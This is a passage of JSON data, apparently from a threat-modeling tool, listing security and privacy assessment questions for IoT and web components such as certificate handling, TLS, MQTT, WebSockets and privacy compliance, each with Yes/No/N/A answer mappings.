differentiation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Is it possible to assign different privileges to users?","propertyID":"cdb65d33-946e-412e-838b-3075e928c4f0"},{"ID":"4ecc4eda-a2e0-4d3e-8bcc-9a606acb2d84","Name":"Improper password storage","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Are passwords stored properly, i.e. using a cryptographic hash function (specifically for passwords) along with a unique unpredictable salt?","propertyID":"984400a6-7bd6-4031-a40c-06f0499e0d86"},{"ID":"ab722480-937d-4b08-98ec-fa7898115e4e","Name":"Missing certificate chain verification","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Is the entire certificate chain validated before trusting a certificate?","propertyID":"20b12b0e-4031-4eb3-ad39-f91489884490"},{"ID":"5670d86c-cde0-4655-880b-8c5338b97ca2","Name":"Certificate expiration","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Is there a secure and reliable way to update certificates?","propertyID":"e09bd987-fbf4-4f3d-afeb-033e5bdcb7f8"},{"ID":"5009ecdf-c775-40ff-88a4-842d4750ab8c","Name":"Revoked certificate","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"463570ce-8495-4b4b-97fe-abed4942059a","Question":"Is it possible to revoke a certificate / check a certificate against a revocation list?","propertyID":"c9d634b6-7eb8-4210-9e97-58e93a5c09a0"},{"ID":"70a2fe78-06b8-4635-8c04-62d2eff0b793","Name":"Uncleared user data","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Question":"Does a factory reset remove all user data/credentials stored on the device?","propertyID":"e6ee6f25-6e52-4f43-93c4-7ef35eb97024"},{"ID":"24dbb5ec-273d-4b9d-be56-c61c06f6d907","Name":"Unhandled exceptions","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","Question":"Can unhandled exceptions occur?","propertyID":"897ef1fd-f1e7-4527-89e3-2cdaf2c8644a"},{"ID":"36e20d86-a97e-4f58-bded-6fabd6455ca2","Name":"Sensitive (error) information exposed ","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","Question":"Do error messages reveal details about the internal state (e.g. stack information, path, passwords)?","propertyID":"f7733c50-2529-459f-9397-8d06f231121c"},{"ID":"d8b6dea3-2785-47f9-8a49-f77031620844","Name":"Missing log entry","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Are configuration changes logged?","propertyID":"0bd863c2-5505-4226-9b28-bab9715c99d1"},{"ID":"3c8b59af-daec-41fc-91a2-798dba990138","Name":"Unsecure mode","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Is the security mode \'Sign\' or \'SignAndEncrypt\'?","propertyID":"4338e868-4e3c-4473-ba27-6148e8b1fc0f"},{"ID":"9e121d1d-f4da-4ca3-bc88-e4669388bf53","Name":"Missing user authentication","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Are all users authenticated (identifier \'anonymous\' is not allowed)? ","propertyID":"1e3a8fb8-4a34-44be-8168-996a7e0283f1"},{"ID":"dc941be3-a445-4474-98ff-4b19af31772c","Name":"Weak cryptographic algorithms","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Is a strong security policy chosen that uses strong cryptographic algorithms?","propertyID":"3f4c724d-3d4d-4b6b-9252-ef43b4240d79"},{"ID":"3d3eb2da-41ed-4f3d-8851-c03422948c97","Name":"Missing certificate","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Question":"Are only connections accepted that provide a trusted certificate?","propertyID":"34344cae-d072-4901-a7be-4084a2534b45"},{"ID":"bb58f761-c25c-4f98-9b41-26320247b929","Name":"Unsecure protocols","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Does the sever use secure protocols?","propertyID":"9ea829dc-59d5-437c-8d24-9908feac2941"},{"ID":"484a3974-f2e1-4535-905b-c7da674c3951","Name":"Unsecure SSL/TLS version","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Does the server use at least TLS 1.2 and older versions of SSL/TLS are disabled?","propertyID":"aa99758d-30a6-4e0f-9d11-1d46c0f43d6c"},{"ID":"a9b8f571-99ec-471e-9bf0-6144757681d9","Name":"Exposes server version","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Has the server a version banner?","propertyID":"6faf97a0-6039-4b7b-ba7c-6b9ef003ede3"},{"ID":"023c9fa3-b198-4038-9d04-17ad84d15f76","Name":"Missing patches","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Is the sever regular updated and patched?","propertyID":"defc6bcc-2bc9-457a-abab-666ec78d4f73"},{"ID":"db5fb272-c8bc-4f16-a6c9-37c80bd4225c","Name":"Missing web application firewall","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Does the system deploy a web application firewall (WAF)?","propertyID":"6f65b93f-53ad-424f-a81b-4777ad48ec97"},{"ID":"d39b86e3-5ed9-4e92-a0c6-2103aee69114","Name":"Undetected misuse of API","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Are all API calls monitored for potential API misuse?","propertyID":"b125fa52-c06e-4e54-88b5-5e9d3929f643"},{"ID":"2bf5c055-bca4-490c-90dd-5e967b925a75","Name":"Unsecure management access","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","Question":"Is the access for device management secured (unique password/certificate, MFA, etc.)?","propertyID":"6962d897-bf88-4745-9f2c-a8aa9d981f93"},{"ID":"facbd825-63f0-4a9b-b357-1035efe81c50","Name":"Unsecure message","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","Question":"Are only messages on port 8883 sent (MQTT over TLS)?","propertyID":"6d7716ae-9870-46a1-9231-a713a0dcd5a0"},{"ID":"da6c4bc6-6173-4e55-9559-296e1c52d086","Name":"Client spoofing","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","Question":"Is the client authenticated and authorized using its own X.509 certificate?","propertyID":"de628891-642c-4b7c-b88b-abf7988721dc"},{"ID":"c1284da0-cb8e-47bc-acf4-a09856baf20b","Name":"No privacy impact assessment","Description":"The PIA should address the following at minimum: identification of sensitive data stored on the device, mechanisms used to inform users of data collected; consent for data collection; processes for use and review of personal data before it is transferred, notice concerning the timing and frequency of data collection, and the ability for users to opt-in or out of data sharing.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Is a privacy impact assessment conducted?","propertyID":"8f4a0dd3-2083-42eb-89bd-48480a082342"},{"ID":"4a2dccf6-91b4-4719-b9cb-d89651045673","Name":"Outdated privacy impact assessment","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Is the privacy impact assessment regularly updated (e.g. annually)?","propertyID":"f3d756ae-7451-4738-986c-0e15d22cb2b2"},{"ID":"a0647742-dcb0-4706-9cdf-a6b969bf3e76","Name":"No safety impact assessment","Description":"Evaluate the safety impacts of an IoT system, log all safety risks, prioritize the risks, and implement mitigations for each risk. Incorporate device and environmental controls to enforce safety requirements, as necessary","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","Question":"Is a safety impact assessment conducted?","propertyID":"a1e7923f-848d-4532-b967-700925af1a77"},{"ID":"f32f6039-042f-4dc2-a8ef-ba75c463cb46","Name":"No fault tree analysis","Description":"Conduct fault tree analysis to identify and prioritize safety risks associated with the IoT system.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","Question":"Is a fault tree analysis conducted?","propertyID":"d0e4fa19-2b29-48b3-b81b-2be909af26d8"},{"ID":"dd4edd5b-398c-40d1-8d1d-239e9e63827e","Name":"No account management","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","Question":"Is there a regular audit of the account management (user, administrator, etc.)?","propertyID":"524e227d-483e-45ae-b002-3041d15fe7e9"},{"ID":"b89dd14a-9e2b-46eb-9236-92968ed70fdb","Name":"Weak authentication","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","Question":"Is certificate-based authentication used to access the system?","propertyID":"330a4f44-1471-460d-889f-4f33a3b8ce72"},{"ID":"50aceb90-7382-434f-bc25-278df0527b49","Name":"Root privileges","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Question":"Is the service running with root privileges?","propertyID":"39de06c5-7cfc-4fb8-8a1f-22a8888cf4ed"},{"ID":"da56feac-ab79-46ba-82df-b6529f907327","Name":"Certificates with long lifetime","Description":"Device certificates may be used without expiration. In this case, short-term operational certificates should be established.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is the lifetime of operational certificates no longer than 3 years?","propertyID":"40c05808-37a1-4394-a9d5-8491b55c3a9b"},{"ID":"f327dd5b-67d4-42ca-af4c-a67f70ed2c0e","Name":"No revocation process","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is there a process for certificate revocation?","propertyID":"083e93ef-da95-4064-a698-6fbd5cf997f5"},{"ID":"8278b519-37ca-4689-9ae7-8b65bf16137b","Name":"No management policy","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is there a certificate management policy (creation, processing, storage, etc.)?","propertyID":"46d35b81-19e3-404e-9fe2-af5088971ffe"},{"ID":"ca2da121-e451-497b-9c49-5126d497589d","Name":"No automated renewal process","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Question":"Is there an automated process to renew certificates?","propertyID":"0c0d40fd-7f0a-412d-ae80-efce58906308"},{"ID":"884ab7b7-1449-4400-8098-eb803094dace","Name":"No incident response team","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","Question":"Is there a incident response team within the organization?","propertyID":"263b5363-2c09-45dd-8ff8-1a430fb7e93a"},{"ID":"b3066f22-a08d-4b53-b75a-bc918a24d326","Name":"No supply chain risk management program","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","Question":"Is there a established supply chain risk management program?","propertyID":"7e3faca4-9b7a-4f8e-8fbe-cb461ca6870f"},{"ID":"7d1d4c4f-21e6-4042-9562-793624b85352","Name":"Risks from third party components","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","Question":"Are third party components (hardware, software) tracked, monitored, and regularly updated?","propertyID":"2614fc88-29cb-4d84-9902-5f7ca7f98410"},{"ID":"a1c43a03-c0a6-4f68-acce-f2bec5433535","Name":"No regular penetration tests","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","Question":"Are penetration tests regularly (at least annually) performed?","propertyID":"d4cb3498-4689-49f2-9f37-8bd45e62a972"},{"ID":"95c83fe6-0e68-4678-ab47-adb9e128ab28","Name":"Missing privacy measures","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Are appropriate technical and operational measures (e. g. data pseudoymisation, data minimisation) implemented?","propertyID":"2a4c8bb7-bd16-4eee-847f-25090eac2d7e"},{"ID":"8d01ce56-3aa8-449d-935d-558d34f283ba","Name":"Privacy law compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Does the system comply with all privacy laws that govern user control over their personal data?","propertyID":"1bd8c924-5f59-42db-a9b2-a4527c46adf2"},{"ID":"2b64e6da-40c0-483c-82d9-e2018f174ab5","Name":"User rights and freedoms violation","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Does the system implement appropriate technical and operational measures for the protection of users rights and freedoms (e. g. transparent information, right of access, right to erasure)?","propertyID":"e79dc2a3-1af9-4a37-b649-9db68eacfc9f"},{"ID":"a6980e98-7544-4b51-b91c-9297025dbd5a","Name":"Insufficient user awareness","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Are users sufficiently aware what personal data is being exposed to the manufacturer, operator, and other partner organisations?","propertyID":"2dd7688c-eddf-4cfa-a496-8c1a46963c89"},{"ID":"93aaeb8f-1493-4904-ac3b-7f0046eb8416","Name":"Missing opt-in mechanism","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","Question":"Does the system implement an opt-int mechanism to get explicit user consent for personal data processing?","propertyID":"d9b40dd2-e5eb-485d-9cf5-db2ac441c899"},{"ID":"e24d7ef1-fe5f-49a9-a2da-ebff96c0e91d","Name":"Missing SDL program","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Is a Secure Development Plan (SDL) implemented (e.g. based on ISO/IEC 27034)?","propertyID":"e1cdca4d-c2a2-48a1-be0e-93af41cd458c"},{"ID":"0157632b-3385-48b4-b168-ce7fa7a54a6e","Name":"Missing responsibility for regulatory compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Do you have a group and organization responsible for regulatory compliance of security, privacy and data protection, and safety? ","propertyID":"9db73879-4ec7-46ae-a8d9-1b555aac6954"},{"ID":"e7ff7061-d8ee-44b1-97e0-e1a0c33e0439","Name":"Missing responsibility for security compliance","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Do you have a group responsible for security compliance and quality control?","propertyID":"f3a7b4b7-2ff8-45e8-be0e-321f8d9304a1"},{"ID":"2fa7f875-077d-40c1-8a63-e3378eb27740","Name":"Missing responsibility for auditing","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Do you have a responsible group for auditing?","propertyID":"8fda48d4-746b-4915-b0d2-55c9b68fbd99"},{"ID":"3636d9df-25b9-4fe0-85bd-f89b9de5f3ab","Name":"Missing testing","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Does your SDL program include internal functional and security testing of the system?","propertyID":"e6f155e1-51e1-4297-80d9-a6a3beef3657"},{"ID":"ef2dfbad-5621-44e0-97b3-0a0519e30e3a","Name":"Missing trusted execution environment","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the Trusted Computing Base utilize a Trusted Execution Environment for isolation of critical operations?","propertyID":"22e9ef37-20a4-4b6c-ba68-ecc90f1d152f"},{"ID":"763bd11d-5e64-4a98-b7e6-acd696199b16","Name":"Missing isolation of cryptographic operations","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Are cryptographic operations (encryption, message signing, key exchange, key storage) performed by the Trusted Computing Base?","propertyID":"28c99516-8651-452e-86f7-ce00df632c8d"},{"ID":"9dcc369c-f1a3-4d46-801a-2897376d14ed","Name":"Decryption of recorded traffic","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Is Perfect Forward Secrecy (PFS) implemented whenever possible/required?","propertyID":"6cce79b8-3df2-4eda-8892-e83b6a2ee603"},{"ID":"631e6457-1f3d-48e8-b9bb-3a0adfe1f0df","Name":"No external audit","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","Question":"Are audits regularly performed by external institutes?","propertyID":"5f7c116c-e2a5-49af-bfd6-9c38541b6a77"},{"ID":"b1270172-52a3-4da4-84bf-ce87f1d3fb69","Name":"Missing employee training and awareness","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Is there a holistic security training and awareness program for employees?","propertyID":"976c15a1-9170-4a2b-a41c-f1dfb4688b1e"},{"ID":"36c1ec42-a9cc-4599-9222-c640986517bc","Name":"No regular employee training","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Is there a continuous, regular and frequently security training for employees? ","propertyID":"f2e2201c-bd33-4dbd-a8ca-1f3a6d16eb9f"},{"ID":"13f28c81-41ca-4a71-9ee3-5e4dfc0957ca","Name":"No secure coding guidelines","Description":"Secure coding practices include, for example, input validation, output encoding, session management, and database security.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","Question":"Are secure coding guidelines implemented?","propertyID":"60fadd09-661b-494a-bcac-f0a652172a50"},{"ID":"f9e03fa2-45ec-468c-9e9d-0737ab21437e","Name":"Missing end of support date","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Question":"Is there a publicly available date for the end of support?","propertyID":"ec622fb4-b851-4c4f-94dc-d5f5b1a6f85d"},{"ID":"3943ab74-ba91-4ea5-a512-955b63b04f1f","Name":"Missing update interval information","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Question":"Is a rough update interval publicly available for customers?","propertyID":"53ceef04-26a6-46a6-834d-bb9c0df2a24d"},{"ID":"327654e1-de90-4d85-aed0-76c8725763ee","Name":"Missing update notification","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Question":"If updates are not applied automatically: is there a process for notifying customers about a new update?","propertyID":"7da73f3c-b3f6-4d35-ae19-c60ed655b14c"},{"ID":"a5bb61b3-b5e1-4d10-a2ca-0bff5aed145e","Name":"Missing time synchronization","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","Question":"Does the system provide the ability to synchronize the system time?","propertyID":"8643278b-1ab3-4359-9ab9-f3911bf336e6"},{"ID":"983e0974-75fe-4359-9384-52654c317b42","Name":"Message sniffing","Description":"Like HTTPS, WSS (WebSockets over SSL/TLS) is encrypted, thus protecting against man-in-the-middle attacks.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is the secure wss:// protocol used over the unsecure ws:// protocol?","propertyID":"cb908fd2-f59c-4f56-ac91-bc1192df5af0"},{"ID":"846dce78-6858-4d22-8564-6b384e07e53f","Name":"Security breach","Description":"It\u2019s relatively easy to tunnel arbitrary TCP services through a WebSocket. So you could, for example, tunnel a database connection directly through to the browser. This is very dangerous, however. Doing so would enable access to these services to an in-browser attacker in the case of a cross-site scripting attack, thus allowing an escalation of a XSS attack into a complete remote breach.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is the connection tunneled to any other service (e.g. a database)?","propertyID":"0d2c8df9-271f-42e2-b3fe-cb74719ff39b"},{"ID":"03467a8a-5fc2-4d72-b496-592985cf5a77","Name":"Missing client data validation","Description":"WebSocket connections are easily established outside of a browser, so you should assume that you need to deal with arbitrary data. Just as with any data coming from a client, you should carefully validate input before processing it.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is client data validated before processing on the server?","propertyID":"8cd86481-a82f-490d-8d62-2195981779e9"},{"ID":"13a95615-356c-438e-be7e-b1d78c4fe46c","Name":"Missing server data validation","Description":"You should apply equal suspicion to data returned from the server. Always process messages received on the client side as data. Don\u2019t try to assign them directly to the DOM, nor evaluate as code. If the response is JSON, always use JSON.parse() to safely parse the data.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is server data validated and parsed before processing on the client?","propertyID":"92c3d3ef-aa2d-4920-978e-ff1755479308"},{"ID":"087222e9-70de-463c-8d00-b6e783f7def6","Name":"Missing authentication and authorization","Description":"The WebSocket protocol doesn\u2019t handle authorization or authentication. Practically, this means that a WebSocket opened from a page behind auth doesn\u2019t \u201cautomatically\u201d receive any sort of auth; you need to take steps to also secure the WebSocket connection.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is authentication and authorization handled separately (e.g. ticket-based)? 